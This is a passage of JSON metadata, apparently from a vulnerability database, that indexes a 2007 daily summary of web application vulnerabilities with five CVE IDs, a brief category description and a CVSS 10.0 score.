"cvelist": ["CVE-2007-1407", "CVE-2007-1494", "CVE-2007-1493", "CVE-2007-1422", "CVE-2007-1408"], "description": "PHP inclusions, SQL injections, directory traversals, cross-site scripting, information leaks, etc.", "edition": 1, "modified": "2007-03-11T00:00:00", "published": "2007-03-11T00:00:00", "id": "SECURITYVULNS:VULN:7386", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7386", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}